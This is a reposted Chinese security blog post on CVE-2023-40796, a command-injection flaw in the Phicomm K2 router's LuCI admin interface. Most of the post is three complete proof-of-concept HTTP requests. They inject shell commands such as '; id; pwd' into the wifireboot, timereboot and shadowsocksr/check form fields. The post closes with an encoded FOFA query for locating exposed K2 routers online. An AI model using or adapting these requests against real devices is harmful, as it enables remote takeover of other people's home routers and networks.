简介
斐讯 K2 采用 802.11AC 无线技术,提高更稳定的 Wi-Fi 性能和更强、更清晰的无线网络信号,双频并发最高可达 1200M 无线速率。为了更好的解决家庭中的信号干扰问题,斐讯 K2 采用双频设计,5G 频段提供了更多的信道,有效降低周边环境中无线信号干扰,数据传输更加高效,此外 K2 选用了知名无线半导体解决方案公司 Skyworks 的 PA+LNA 模组,PA 提高无线信号发射功率,LNA 可以降低无线信号接收噪声干扰,收发兼备,2.4G 无线性能相比普通路由器提升 4 倍,5G 无限性能高达 5 倍。
漏洞描述
Phicomm k2 路由器shadowsocksr.lua和timerbooter.lua和wifireboot.lua对传入的参数未进行处理,导致了远程命令执行。
影响版本
CVE
作者:
Phicomm
k2
V22
.6
.529
.216
,其他系列产品暂时未验证。
本人验证:其他版本也存在,只要漏洞接口存在,就有可能存在漏洞。部分接口或者版本执行
payload
后,返回包中没有执行结果。
空间测绘
回复“CVE-2023-40796”获取空间测绘搜索语句
漏洞利用
首先登录路由器后台
漏洞点No.1
POST
/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifireboot
HTTP/1.1
Host
: xxx.xxx.xxx
Content-Length
: 566
Cache-Control
: max-age=0
Upgrade-Insecure-Requests
: 1
Origin
: http://xxx.xxx.xxx
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryMxXftWGyzoxhV5cc
User-Agent
: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer
: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifiset/
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: sysauth=xxxxxxxxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform
: "Windows"
sec-ch-ua
: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile
: ?0
Connection
: close
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-
data
; name=
"wifiRebootEnablestatus"
%s
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-
data
; name=
"wifiRebootrange"
12
:
00
; id; pwd
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-
data
; name=
"wifiRebootendrange"
%s:
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-
data
; name=
"cururl2"
http:
//xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxa4053a404162/admin/wifiset/
------WebKitFormBoundaryMxXftWGyzoxhV5cc--
漏洞点No.2
POST
/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa404162/admin/timereboot
HTTP/1.1
Host
: xxx.xxx.xxx
Content-Length
: 458
Cache-Control
: max-age=0
Upgrade-Insecure-Requests
: 1
Origin
: http://xxx.xxx.xxx
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajic
User-Agent
: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer
: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxa404162/admin/wifiset/
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: sysauth=xxxxxxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform
: "Windows"
sec-ch-ua
: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile
: ?0
Connection
: close
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-
data
; name=
"timeRebootEnablestatus"
on
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-
data
; name=
"timeRebootrange"
00
:
05
; id ; pwd
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-
data
; name=
"cururl"
http:
//xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa4053a404162/admin/wifiset/
------WebKitFormBoundaryU9LxasH5JIOWajic--
漏洞点No.3
POST
/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxxxxx04162/admin/shadowsocksr/check
HTTP/1.1
Host
: xxx.xxx.xxx
User-Agent
: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept
: */*
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajic
Referer
: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxa404162/admin/shadowsocksr/status
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
: sysauth=xxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform
: "Windows"
sec-ch-ua
: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile
: ?0
Connection
: close
Content-Length
: 143
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="set"
;id;
------WebKitFormBoundaryU9LxasH5JIOWajic
空间测绘语句
FOFA BASE64
cHJvZHVjdD0iUEhJQ09NTS1LMiI=
原文始发于微信公众号(不够安全):CVE-2023-40796:斐讯Phicomm K2路由器 远程命令执行 附POC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论